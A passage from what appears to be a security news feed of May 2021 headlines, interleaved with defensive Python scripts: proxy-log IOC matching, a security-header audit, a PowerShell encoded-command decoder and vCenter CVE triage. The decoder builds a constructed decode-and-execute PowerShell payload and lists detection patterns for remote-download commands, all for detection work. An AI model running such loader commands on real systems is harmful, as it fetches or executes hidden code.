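    counts = {}
    for h in hits:
        counts[h["client"]] = counts.get(h["client"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in find_ioc_hits(SAMPLE_PROXY_LOG):
        print(h["ts"], h["client"], h["method"], h["host"], "-", h["note"])
    print(clients_by_hit_count(find_ioc_hits(SAMPLE_PROXY_LOG)))
```

The subdomain test matters in practice: a beacon to a host under the IOC domain is still the IOC, while a lookalike that merely ends in the same string is not. On a real proxy feed, the next step would be to join the hits against process telemetry on the matching client to confirm that powershell.exe, not a browser, made the POST.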

The Hacker News

May 27, 2021 – Policy and Law

Hacker Who Targeted Cops Gets Jail Time Full Text

Abstract New Hampshire hacker behind bars after targeting Auburn Police Department

Infosecurity Magazine

May 27, 2021 – Cryptocurrency

The Ransomware Problem Is a Bitcoin Problem Full Text

Abstract The best way to deal with this new era of big-game ransomware will involve not just securing computer systems or prosecuting criminals, but disrupting the one payment channel capable of moving millions at a time outside of money laundering laws: Bitcoin and other cryptocurrencies.

Lawfare

May 27, 2021 – APT

APT hacked a US municipal government via an unpatched Fortinet VPN Full Text

Abstract The FBI revealed that foreign hackers compromised the network of a local US municipal government by exploiting flaws in an unpatched Fortinet VPN. The Federal Bureau of Investigation (FBI) reported that an APT group had breached the network of a local...

Security Affairs

May 27, 2021 – Attack

Is the attack on Fujitsu’s ProjectWEB SaaS platform the next big supply chain attack? Full Text

Abstract While it’s still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack not unlike the one that targeted the SolarWinds supply chain.

SCMagazine

May 27, 2021 – Malware

Targeted AnyDesk Ads on Google Served Up Weaponized App Full Text

Abstract Malicious ad campaign was able to rank higher in searches than legitimate AnyDesk ads.

Threatpost

May 27, 2021 – APT

FBI: APT hackers breached US local govt by exploiting Fortinet bugs Full Text

Abstract The Federal Bureau of Investigation (FBI) says the webserver of a US municipal government was breached by state-sponsored attackers after hacking a Fortinet appliance.

BleepingComputer

May 27, 2021 – Ransomware

Zeppelin Ransomware Begins a New Ride Full Text

Abstract After a hiatus, Zeppelin ransomware, a possible variant of the Vega Ransomware-as-a-Service (RaaS), is active again. Without stepping into the trend of double extortion, it can still cause serious damage to victims' systems.

Cyware Alerts - Hacker News

May 27, 2021 – Government

3 GOP senators come out against Biden intelligence nominee over Huawei ties Full Text

Abstract Three Republican senators say they won’t back President Biden’s nominee to serve as the top lawyer for the intelligence community because of his past experience working for a Chinese company accused of intellectual property theft.

The Hill

May 27, 2021 – Hacker

Hackers Using Fake Foundations to Target Uyghur Minority in China Full Text

Abstract The Uyghur community located in China and Pakistan has been the subject of an ongoing espionage campaign aiming to trick the targets into downloading a Windows backdoor to amass sensitive information from their systems. "Considerable effort was put into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up to date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups," according to joint research published by Check Point Research and Kaspersky today. The Uyghurs are a Turkic ethnic minority group originating from Central and East Asia and are recognized as native to the Xinjiang Uyghur Autonomous Region in Northwest China. At least since 2015, government authorities have placed the region under tight surveillance, putting hundreds of thousands into prisons and internment camps that the government calls "Vocational Education and Training Centers.

The Hacker News

May 27, 2021 – Government

Feds Warn DarkSide May Not Stay Dark Full Text

Abstract Officials warn disbanded cyber-criminal gang may return soon under a new alias

Infosecurity Magazine

May 27, 2021 – Government

DHS announces security measures for critical pipeline industry Full Text

Abstract The US Department of Homeland Security (DHS) has announced new cybersecurity requirements for critical pipeline owners and operators. The Colonial pipeline incident continues to have a serious impact on the critical infrastructure sector. The US Department...

Security Affairs

May 27, 2021 – Government

Fraud and security departments converge on battle against ‘synthetic identities’ Full Text

Abstract The Federal Reserve recently produced a formal definition for synthetic identity fraud, a process that involved a committee of a dozen outside experts convening over nine months. So what is it? And why should CISOs care?

SCMagazine

May 27, 2021 – Attack

New BazaFlix attack pushes BazarLoader malware via fake movie site Full Text

Abstract Security researchers found a new BazarCall email phishing campaign that manages to bypass automated threat detection systems to deliver the BazarLoader malware used by the TrickBot gang.

BleepingComputer

May 27, 2021 – Attack

QNAP Devices Bombarded by Cyberattacks Full Text

Abstract Attacks on Taiwan-based QNAP's devices continue to turn ugly. QNAP is now advising its customers to update the HBS 3 disaster recovery app to block Qlocker ransomware actors, who exploit a hard-coded credentials (backdoor account) vulnerability in it.

Cyware Alerts - Hacker News

May 27, 2021 – General

TSA formally directs pipeline companies to report cybersecurity incidents in wake of Colonial attack Full Text

Abstract The Transportation Security Administration (TSA) will formally issue a security directive Thursday to strengthen federal cybersecurity oversight of pipelines, weeks after a ransomware attack on Colonial Pipeline led to fuel shortages in multiple states. 

The Hill

May 27, 2021 – Breach

Data Breach at Canada Post Full Text

Abstract Malware attack on third-party supplier leads to data breach at Canada Post

Infosecurity Magazine

May 27, 2021 – General

NASA identified 1,785 cyber incidents in 2020 Full Text

Abstract NASA identified more than 6,000 cyber-related incidents in the last four years, according to a report published by its Office of Inspector General. The U.S. National Aeronautics and Space Administration (NASA) has identified more than 6,000 cyber-related...

Security Affairs

May 27, 2021 – Attack

How Florida water attack investigators avoided an embarrassing misattribution Full Text

Abstract Dragos limited initial disclosure to only relevant parties, after discovering a watering-hole malware attack that later turned out to be unrelated.

SCMagazine

May 27, 2021 – Vulnerabilities

Klarna mobile app bug let users log into other customers’ accounts Full Text

Abstract Klarna Bank suffered a severe technical issue this morning that allowed mobile app users to log into other customers' accounts and see their stored information.

BleepingComputer

May 27, 2021 – Policy and Law

French authorities seize their third dark web marketplace Full Text

Abstract French authorities have dismantled their third dark web marketplace over the last four years after they seized control of “Le Monde Parallèle” (The Parallel World) last week.

The Record

May 27, 2021 – Phishing

Uyghurs targeted by fake human rights emails Full Text

Abstract Members of the Uyghur Muslim community in China and abroad are being targeted in surveillance efforts by likely "Chinese-speaking" hackers through the use of fake emails from the United Nations (U.N.) and a human rights group, cybersecurity researchers announced Thursday.

The Hill

May 27, 2021 – Phishing

Chinese Phishing Attack Targets High-Profile Uyghurs Full Text

Abstract Kaspersky and Check Point team up to reveal latest espionage campaign

Infosecurity Magazine

May 27, 2021 – Breach

Hackers compromised Japanese government offices via Fujitsu’s ProjectWEB tool Full Text

Abstract Threat actors have compromised offices of multiple Japanese agencies via Fujitsu's ProjectWEB information sharing tool. Threat actors have breached the offices of multiple Japanese agencies after they gained access to projects that use the Fujitsu...

Security Affairs

May 27, 2021 – Government

DHS issues cyber order to pipeline operators in first move to regulate critical infrastructure sectors Full Text

Abstract The TSA order marks the first mandatory cybersecurity practices for pipelines, and what some expect will be the first of more standards that the government puts in place to regulate how critical infrastructure operators protect networks and systems.

SCMagazine

May 27, 2021 – Government

US announces new security directive after critical pipeline hack Full Text

Abstract The US Department of Homeland Security (DHS) has announced new pipeline cybersecurity requirements after the largest fuel pipeline in the United States was forced to shut down operations in early May following a ransomware attack.

BleepingComputer

May 27, 2021 – Attack

Fake Human Rights Organization, UN Branding Used by Chinese Threat Actor to Target Uyghurs in Ongoing Cyberattacks Full Text

Abstract Potential victims are sent phishing documents branded with the UNHRC logo. Named UgyhurApplicationList.docx, this document contains decoy material relating to discussions of human rights violations.

ZDNet

May 27, 2021 – General

Number of Breached Records Soars 224% Annually Full Text

Abstract Imperva warns of gap between security and digital adoption

Infosecurity Magazine

May 27, 2021 – Vulnerabilities

HPE fixes critical zero-day vulnerability disclosed in December Full Text

Abstract Hewlett Packard Enterprise (HPE) has released a security update to address a zero-day remote code execution vulnerability disclosed last year, in December.

BleepingComputer

May 27, 2021 – Attack

Canada Post Among 44 Organizations Linked to 950,000 Customers Impacted by Malware Attack at Crown Corporation Full Text

Abstract A malware attack on a supplier to Canada Post, a Crown corporation, has caused a data breach affecting 44 of the postal agency’s large business clients and their 950,000 receiving customers, the agency confirmed Wednesday.

Global News

May 27, 2021 – Covid-19

A Third of #COVID19 Fraud Victims Go Hungry Full Text

Abstract ITRC report claims many don’t have money for food or utilities

Infosecurity Magazine

May 27, 2021 – Government

Japan Expects Russian Cyberattacks on Tokyo Summer Olympics Full Text

Abstract According to Masatoshi Fujitani, president of the Tokyo-based Japan Forum for Strategic Studies (JFSS), the Summer Olympics in Tokyo are likely to be targeted by cyberattacks.

Softpedia

May 27, 2021 – Government

Russian Intelligence Agency FSB Reports Hacking Campaign Aimed at Government Agencies Full Text

Abstract The report also mentioned that hackers had used the cloud storage facilities of Russia's leading technology firms, Yandex and Mail.ru, to help exfiltrate data stolen from the government agencies.

US News

May 27, 2021 – Malware

Melting Ice - Tracking IcedID Servers with a few simple steps Full Text

Abstract This threat has constantly been growing in the past year and boasts a wide range of malicious capabilities such as browser hooking, credential theft, MiTM proxy setup, and a VNC module, among others.

Check Point Research

May 27, 2021 – General

Cyber attacks on banks can trigger more rating action, warns S&P Full Text

Abstract Cyberattacks can harm credit ratings mainly through reputational damage and potential monetary losses, the ratings agency said in a report titled 'Cyber Risk In A New Era: The Effect On Bank Ratings.'

The Times Of India

May 27, 2021 – Vulnerabilities

M1RACLES, the unpatchable bug that impacts new Apple M1 chips Full Text

Abstract A security expert has discovered a vulnerability in Apple M1 chips, dubbed M1RACLES, that cannot be fixed. Software engineer Hector Martin from Asahi Linux has discovered a vulnerability in the new Apple M1 chips, tracked as CVE-2021-30747, that was named...

Security Affairs

May 27, 2021 – Breach

Japanese government agencies suffer data breaches after Fujitsu hack Full Text

Abstract Offices of multiple Japanese agencies were breached via Fujitsu's "ProjectWEB" information sharing tool. Fujitsu states that attackers gained unauthorized access to projects that used ProjectWEB, and stole some customer data.

BleepingComputer

May 26, 2021 – Vulnerabilities

Newly Discovered Bugs in VSCode Extensions Could Lead to Supply Chain Attacks Full Text

Abstract Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks. Some of the extensions in question are "LaTeX Workshop," "Rainbow Fart," "Open in Default Browser," and "Instant Markdown," all of which have cumulatively racked up about two million installations between them. "Developer machines usually hold significant credentials, allowing them (directly or indirectly) to interact with many parts of the product," researchers from open-source security platform Snyk said in a deep-dive published on May 26. "Leaking a developer's private key can allow a malicious stakeholder to clone important

The Hacker News

May 26, 2021 – Criminals

Cybercriminals Exploiting API Keys to Steal Cryptocurrency Full Text

Abstract Stolen API keys are being increasingly sold on hacker forums. Cyber adversaries are exploiting cryptocurrency exchange API keys and using them to steal cryptocurrencies from victims.

Cyware Alerts - Hacker News

May 26, 2021 – General

Hillicon Valley: Activists tackle shareholder meetings | Amazon to acquire MGM | EU updates disinformation rules Full Text

Abstract Happy Wednesday! Shareholder meetings are providing activists an opportunity to push tech giants on issues including civil rights violations, hate speech and whistleblower protections. In other news, Amazon announced its intention to acquire MGM Studios in a move sure to heighten already elevated antitrust scrutiny against the e-commerce giant.

The Hill

May 26, 2021 – Malware

Data Wiper Malware Disguised As Ransomware Targets Israeli Entities Full Text

Abstract Researchers on Tuesday disclosed a new espionage campaign, active against Israeli entities since at least December 2020, that resorts to destructive data-wiping attacks while camouflaging the malicious activity as ransomware extortion. Cybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker "Agrius." "An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets," the researchers said. "The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups." The group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second

The Hacker News

May 26, 2021 – Disinformation

Influencers Offered Money to Vilify Vaccine Full Text

Abstract PR agency allegedly asked influencers to discredit Pfizer vaccine in exchange for payment

Infosecurity Magazine

May 26, 2021 – Breach

Nearly 50,000 IPs compromised in Kubernetes clusters by TeamTNT Full Text

Abstract Researchers discovered about 50,000 IPs across multiple Kubernetes clusters that were compromised by the TeamTNT threat actors. Researchers from Trend Micro reported that about 50,000 IPs were compromised across multiple Kubernetes clusters in a cryptojacking...

Security Affairs

May 26, 2021 – Government

Colonial Pipeline, Microsoft, crypto crackdowns: Feds point to critical cyber moments Full Text

Abstract Three law enforcement officials reflect on what was, to them, the biggest cybercrime stories or developments over the past year.

SCMagazine

May 26, 2021 – Ransomware

A Peek Inside the Underground Ransomware Economy Full Text

Abstract Threat hunters weigh in on the business of ransomware, the complex relationships between cybercriminals, and how they work together and hawk their wares on the Dark Web.

Threatpost

May 26, 2021 – General

FBI’s IC3 Logs 1 Million Scam Complaints in 14 Months Full Text

Abstract While these numbers point to the fact that people are more aware and thus, are logging their complaints, they also signify that a greater number of people are being impacted by online scams.

Cyware Alerts - Hacker News

May 26, 2021 – Criminals

Hackers release patient data stolen from New Zealand health systems Full Text

Abstract Hackers sent patient data stolen during an attack on New Zealand’s Waikato District health system to local media outlets on Wednesday, with the outlets declining to publish the sensitive information. 

The Hill

May 26, 2021 – Criminals

Cyber-criminal Gang Targets Texas Unemployment System Full Text

Abstract Scattered Canary shares 13-page tutorial on how to commit fraud via Texas Workforce Commission website

Infosecurity Magazine

May 26, 2021 – Policy and Law

French police seized dark web marketplace Le Monde Parallèle Full Text

Abstract Last week, French authorities seized the dark web marketplace Le Monde Parallèle, another success for the national police in the fight against cybercrime. French authorities seized the dark web marketplace Le Monde Parallèle, the operation...

Security Affairs

May 26, 2021 – Malware

Malware used zero-day exploit to take screenshots of victims’ Macs Full Text

Abstract The TCC bypass exploit could have allowed attackers to create ransomware that encrypts protected system files and folders without user knowledge.

SCMagazine

May 26, 2021 – Ransomware

Double Encryption: A New Ransomware Trend Full Text

Abstract This is not the first time researchers spotted double encryption. It usually happens when two distinct ransomware groups compromise the same victim at the same time.

Cyware Alerts - Hacker News

May 26, 2021 – Skimming

22 Americans Indicted Over Card-Skimming Scam Full Text

Abstract Nearly two dozen individuals charged with purchasing and using payment cards stolen from national retail chain

Infosecurity Magazine

May 26, 2021 – Attack

Google discovered a new variant of Rowhammer attack dubbed Half-Double Full Text

Abstract Google experts discovered a new variant of the Rowhammer attack against DRAM that bypasses all current defenses. Google researchers discovered a new variant of Rowhammer attacks, dubbed "Half-Double," that allows bypassing all current defenses. In...

Security Affairs

May 26, 2021 – Vulnerabilities

Chrome 91 features 32 security fixes, enhancements for Linux Full Text

Abstract Google’s high-severity fixes address weaknesses that could potentially allow a remote attacker to execute arbitrary code on an unknowing target.

SCMagazine

May 26, 2021 – Government

NASA Intends to Reorganize its Cybersecurity Strategy Full Text

Abstract As per a report issued by NASA's inspector general, "Attacks on NASA networks are not a new phenomenon, although attempts to steal critical information are increasing in both complexity and severity".

Softpedia

May 26, 2021 – Privacy

NHS to Share Patient Data with Third Parties, Fueling Privacy and Security Fears Full Text

Abstract Sensitive data will be made available to academic and commercial third parties for research and planning

Infosecurity Magazine

May 26, 2021 – Attack

Belgium Interior Ministry said it was hit by a sophisticated cyber attack Full Text

Abstract The Belgian interior ministry was targeted by a "sophisticated" cyber attack, a spokesman told RTBF public television on Tuesday. The Belgian interior ministry was hit by a "sophisticated" cyber-espionage attack, the news was confirmed by a spokesman...

Security Affairs

May 26, 2021 – Vulnerabilities

M1RACLES bug impacts Apple M1 chips, but no need to panic Full Text

Abstract Discovered by Hector Martin, a software engineer at Asahi Linux, a project that works on porting Linux for Mac hardware, the vulnerability was codenamed M1RACLES and tracked as CVE-2021-30747.

The Record

May 26, 2021 – Breach

UK Police Suffered Thousands of Data Breaches in 2020 Full Text

Abstract Lancashire Constabulary was the worst offender

Infosecurity Magazine

May 26, 2021 – Vulnerabilities

Another critical bug impacts all VMware vCenter Server installs Full Text

Abstract VMware addresses a critical remote code execution (RCE) flaw in the Virtual SAN Health Check plug-in that impacts all vCenter Server installs. VMware has released security updates to address a remote code execution (RCE) flaw in vCenter Server that...

Security Affairs

May 26, 2021 – Business

Salt Security Raises $70 Million To Strengthen API Security Full Text

Abstract Salt Security closed a $70 million Series C funding round led by Advent International to scale the company’s sales organization globally and enhance security earlier in the development lifecycle.

CRN

May 26, 2021 – Attack

Bose Reveals Ransomware Attack Impacting Staff Full Text

Abstract Threat actors accessed sensitive personal information

Infosecurity Magazine

May 26, 2021 – Vulnerabilities

Thousands of Chrome Extensions Found Tampering with Security Headers Full Text

Abstract Thousands of Google Chrome extensions available on the official Chrome Web Store are tampering with security headers on popular websites, putting users at risk of a wide range of web-based attacks.
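The risk described above is that a response which left the server with a sound set of security headers reaches the page with some of them removed or weakened. The following is an added example, not code from The Record's report or from the underlying research: it audits a header set against a baseline a practitioner would expect (CSP with a non-permissive script source, X-Frame-Options, HSTS of at least a year, nosniff) and diffs what the server sent against what was observed in the browser. Both header sets are constructed for the demonstration, as is the example.test origin.

```python
import re

ONE_YEAR = 31536000  # seconds; a common HSTS max-age floor

# Constructed: what the origin server sent ...
SERVER_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self' https://static.example.test",
    "X-Frame-Options": "DENY",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Content-Type": "text/html; charset=utf-8",
}

# ... and what the page saw after a response-rewriting extension touched it (constructed).
OBSERVED_HEADERS = {
    "X-Frame-Options": "ALLOWALL",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Content-Type": "text/html; charset=utf-8",
}


def _norm(headers):
    """Header names are case-insensitive; compare on a lower-cased, stripped copy."""
    return {k.lower(): v.strip() for k, v in headers.items()}


def _csp_directive(csp, name):
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0] == name:
            return parts[1:]
    return None


def audit_headers(headers):
    """Return a list of findings; an empty list means the baseline is met."""
    h = _norm(headers)
    issues = []

    csp = h.get("content-security-policy")
    if csp is None:
        issues.append("CSP missing")
    else:
        # script-src falls back to default-src when absent
        sources = _csp_directive(csp, "script-src")
        if sources is None:
            sources = _csp_directive(csp, "default-src")
        if not sources:
            issues.append("CSP restricts no script sources")
        elif "'unsafe-inline'" in sources or "*" in sources:
            issues.append("CSP script-src allows inline or wildcard sources")

    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        issues.append("X-Frame-Options missing or permissive")

    m = re.search(r"max-age=(\d+)", h.get("strict-transport-security", ""))
    if not m or int(m.group(1)) < ONE_YEAR:
        issues.append("HSTS missing or max-age under one year")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        issues.append("X-Content-Type-Options not nosniff")
    return issues


def diff_headers(server, observed):
    """What disappeared, what changed, and what was added between the two views."""
    s, o = _norm(server), _norm(observed)
    return {
        "removed": sorted(k for k in s if k not in o),
        "changed": {k: (s[k], o[k]) for k in s if k in o and s[k] != o[k]},
        "added": sorted(k for k in o if k not in s),
    }


if __name__ == "__main__":
    print("server  :", audit_headers(SERVER_HEADERS))
    print("observed:", audit_headers(OBSERVED_HEADERS))
    print("diff    :", diff_headers(SERVER_HEADERS, OBSERVED_HEADERS))
```

The diff is the useful part when hunting for this class of extension: the server-side capture comes from the origin (or a curl from outside the browser), the observed side from the browser's developer tools or a page-context fetch, and any header that is present in the first view but missing or weakened in the second was altered somewhere in between.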

The Record

May 26, 2021 – Business

Cybersecurity monitoring and threat prevention startup Uptycs raises $50M Full Text

Abstract Cloud security analytics platform Uptycs today announced it has raised $50 million in a Series C funding round led by Norwest Venture Partners, bringing the company’s total raised to $93 million.

Venture Beat

May 26, 2021 – Policy and Law

Europe’s Top Human Rights Court Rules UK Mass Surveillance Illegal Full Text

Abstract Case could pave way for challenges to Snooper’s Charter

Infosecurity Magazine

May 26, 2021 – General

Not as complex as we thought: Cyberattacks on operational technology are on the rise Full Text

Abstract Over the past few years, the researchers have observed OT assets becoming compromised through a variety of methods, including remote access services and virtual network computing (VNC).

ZDNet

May 26, 2021 – Policy and Law

WhatsApp Sues Indian Government Over New Privacy Threatening Internet Law Full Text

Abstract WhatsApp on Wednesday fired a legal salvo against the Indian government to block new regulations that would require messaging apps to trace the "first originator" of messages shared on the platform, thus effectively breaking encryption protections. "Requiring messaging apps to 'trace' chats is the equivalent of asking us to keep a fingerprint of every single message sent on WhatsApp, which would break end-to-end encryption and fundamentally undermines people's right to privacy," a WhatsApp spokesperson told The Hacker News via email. "We have consistently joined civil society and experts around the world in opposing requirements that would violate the privacy of our users." With over 450 million active users, India is WhatsApp's biggest market by users. The lawsuit, filed by the Facebook-owned messaging service in the Delhi High Court, seeks to bar new internet rules that come into force effective May 26. Called the Intermediary Guide

The Hacker News

May 26, 2021 – Government

DHS to issue first cybersecurity regulations for pipelines after Colonial hack Full Text

Abstract The Transportation Security Administration will issue a security directive this week requiring pipeline companies to report cyber incidents to federal authorities, senior DHS officials said.

Washington Post

May 26, 2021 – Malware

SolarMarker Backdoor Pretends to be Legit PDFescape Installer Full Text

Abstract The SolarMarker backdoor pretends to be a legitimate PDFescape installer. It creates an encoded file and then executes a PowerShell command to decode and execute the malicious script.
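Staging chains like the one described above typically surface in process-creation telemetry as a hidden-window PowerShell launch carrying an encoded argument, which is what most endpoint tooling logs rather than the file contents. The following is an added example, not Cyren's code and not the SolarMarker script itself: it pulls -EncodedCommand arguments out of constructed log lines, decodes them (PowerShell expects base64 over UTF-16LE) and scores what the decoded command does. The log format, host and user names and the payload are constructed for the demonstration.

```python
import base64
import re

# Constructed payload: a one-liner that reads a staged file and evaluates it,
# the shape of a decode-and-execute step. Encoded exactly as powershell.exe expects.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX ([System.IO.File]::ReadAllText('C:\\Users\\Public\\update.txt'))".encode("utf-16le")
).decode("ascii")

# Constructed process-creation log lines (assumed key=value format, not real telemetry).
SAMPLE_LOG_LINES = [
    "2021-05-26T10:02:11Z host=WS01 user=jdoe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    f'cmdline="powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED_PAYLOAD}"',
    '2021-05-26T10:02:12Z host=WS01 user=jdoe image=C:\\Windows\\explorer.exe cmdline="explorer.exe"',
    '2021-05-26T10:05:40Z host=WS02 user=admin image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell.exe -Command Get-Process"',
]

CMDLINE_RE = re.compile(r'cmdline="([^"]*)"')
# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_ARG_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# (pattern, reason) pairs checked against both the raw command line and the decoded payload.
SUSPICIOUS = [
    (r"\bIEX\b|Invoke-Expression", "invokes dynamically built code"),
    (r"ReadAllText|Get-Content", "reads a staged file from disk"),
    (r"FromBase64String", "decodes a further base64 layer"),
    (r"DownloadString|Net\.WebClient|Invoke-WebRequest", "fetches remote content"),
    (r"-w(?:indowstyle)?\s+hidden", "hides the console window"),
]


def decode_encoded_command(b64: str):
    """Decode an -EncodedCommand value; None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_log_lines(lines):
    """Return one finding per encoded PowerShell launch, with the decoded command and reasons."""
    findings = []
    for line in lines:
        m = CMDLINE_RE.search(line)
        if not m:
            continue
        cmdline = m.group(1)
        enc = ENCODED_ARG_RE.search(cmdline)
        if not enc:
            continue
        decoded = decode_encoded_command(enc.group(1))
        reasons = [why for pattern, why in SUSPICIOUS
                   if re.search(pattern, cmdline, re.I)
                   or (decoded and re.search(pattern, decoded, re.I))]
        findings.append({"line": line, "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_log_lines(SAMPLE_LOG_LINES):
        print(f["decoded"])
        print("  ->", "; ".join(f["reasons"]))
```

A decoded command that both reads a file dropped somewhere world-writable and hands the result to IEX is the pattern to alert on; an encoded argument on its own is common in legitimate administration, which is why the scoring looks at what the command does rather than at the encoding alone.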

Cyren

May 26, 2021 – Hacker

Agrius group targets Israel with data-wipers disguised as ransomware Full Text

Abstract An Iran-linked threat actor tracked as Agrius employed data-wipers disguised as ransomware to destroy targeted IT infrastructure. Researchers from cyber-security firm SentinelOne discovered a new Iran-linked threat actor, tracked as Agrius, which...

Security Affairs

May 25, 2021 – General

Russian Hydra DarkNet Market Made Over $1.3 Billion in 2020 Full Text

Abstract Russian-language dark web marketplace Hydra has emerged as a hotspot for illicit activities, pulling in a whopping $1.37 billion worth of cryptocurrencies in 2020, up from $9.4 million in 2016. The "blistering growth" in annual transaction volumes marks a staggering 624% year-over-year jump over a three-year period from 2018 to 2020. "Further buoying Hydra's growth is its ability—or its good fortune—to remain running and unscathed against competitor attacks or law enforcement scrutiny; its only downtime of note occurred during a short time period at the beginning of the COVID-19 global pandemic in late March 2020," threat intelligence firm Flashpoint said in a report jointly published with blockchain analysis firm Chainalysis. Active since 2015, Hydra opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily facilitating narcotics trade, before becoming a bazaar for all things criminal, including offering BTC cash-out

The Hacker News

May 25, 2021 – Vulnerabilities

Critical RCE Vulnerability Found in VMware vCenter Server — Patch Now! Full Text

Abstract VMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server. Tracked as CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which is enabled by default in the vCenter Server. "A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server," VMware said in its advisory. VMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability. The patch release also rectifies an authenticati

The Hacker News
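
Two triage steps a practitioner wants after reading the advisory above: is this appliance on a fixed build, and did anything outside the admin network touch the vSAN plug-in before the patch landed? The script below is an added example, not VMware tooling and not from the article. It assumes the fixed builds of vCenter 7.0 U2b, 6.7 U3n and 6.5 U3p as listed in VMSA-2021-0010 (re-check them against the advisory before relying on the table), a version response shaped like the appliance REST call GET /rest/appliance/system/version, and that the vSAN Health plug-in's proxy endpoint sits under /ui/h5-vsan/rest/proxy/service/, the path public post-patch analyses tie to exploitation attempts. The log lines are constructed in Common Log Format; adapt the regex to the vsphere-ui access log on a real appliance.

```python
"""Post-advisory triage for CVE-2021-21985 (VMSA-2021-0010). Added example; not VMware tooling.

Assumptions that go beyond the advisory text:
  * FIXED_BUILDS holds the first patched build of each supported line (vCenter 7.0 U2b,
    6.7 U3n, 6.5 U3p) as listed in VMSA-2021-0010; verify against the advisory.
  * `version_info` has the shape of the appliance REST response from
    GET /rest/appliance/system/version ("version" like "7.0.2.00100", "build" as a string).
  * The vSAN Health plug-in's proxy endpoint is /ui/h5-vsan/rest/proxy/service/ (from public
    post-patch analyses); the sample log below is constructed, not real traffic.
"""
import re

FIXED_BUILDS = {"7.0": 17958471, "6.7": 18010531, "6.5": 17994927}
VSAN_PROXY_PREFIX = "/ui/h5-vsan/rest/proxy/service/"


def release_line(version: str) -> str:
    """'7.0.2.00100' -> '7.0'; '6.7.0.48000' -> '6.7'."""
    m = re.match(r"(\d+\.\d+)", version)
    if not m:
        raise ValueError(f"unrecognised vCenter version string: {version!r}")
    return m.group(1)


def assess(version_info: dict) -> dict:
    """Compare the appliance's build against the first fixed build of its release line."""
    line = release_line(version_info["version"])
    build = int(version_info["build"])
    fixed = FIXED_BUILDS.get(line)
    if fixed is None:
        status = "unknown-release-line"  # not in the table: check the advisory by hand
    elif build >= fixed:
        status = "patched"
    else:
        status = "VULNERABLE"
    return {"line": line, "build": build, "fixed_build": fixed, "status": status}


# Common Log Format: src ident user [timestamp] "METHOD path HTTP/x" status bytes
ACCESS_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)'
)


def vsan_proxy_hits(log_lines, allowed_sources=frozenset()):
    """Requests to the vSAN plug-in proxy from any source not in `allowed_sources`.
    The advisory only requires network access to 443, so pre-patch hits from hosts
    that are neither the appliance itself nor the admin network are worth pulling."""
    hits = []
    for line in log_lines:
        m = ACCESS_LOG_RE.match(line)
        if m and m["path"].startswith(VSAN_PROXY_PREFIX) and m["src"] not in allowed_sources:
            hits.append((m["src"], m["ts"], m["method"], m["path"]))
    return hits


# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '127.0.0.1 - - [25/May/2021:09:58:11 +0000] "GET /ui/h5-vsan/rest/proxy/service/sample HTTP/1.1" 200 310',
    '198.51.100.4 - - [25/May/2021:10:03:42 +0000] "GET /ui/login HTTP/1.1" 200 1420',
    '203.0.113.7 - - [25/May/2021:10:14:03 +0000] "POST /ui/h5-vsan/rest/proxy/service/sample HTTP/1.1" 200 512',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    print(assess({"version": "7.0.2.00100", "build": "17958471"}))   # patched
    print(assess({"version": "7.0.1.00200", "build": "17000000"}))   # VULNERABLE
    for hit in vsan_proxy_hits(SAMPLE_LOG, allowed_sources={"127.0.0.1"}):
        print("review:", hit)
```

A "patched" result only means the build carries the fix; the workaround of marking the plug-in incompatible, if you applied it, still needs to be reverted or confirmed per VMware's KB, and any pre-patch hit from an unexpected source should be treated as a possible compromise of the appliance, not just a scan.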

May 25, 2021 – General

Security pros rely on peer groups and open communication for help with stress Full Text

Abstract More than ever, it’s vital that infosec colleagues and company leadership lend a sympathetic ear and establish a trusting relationship.

SCMagazine

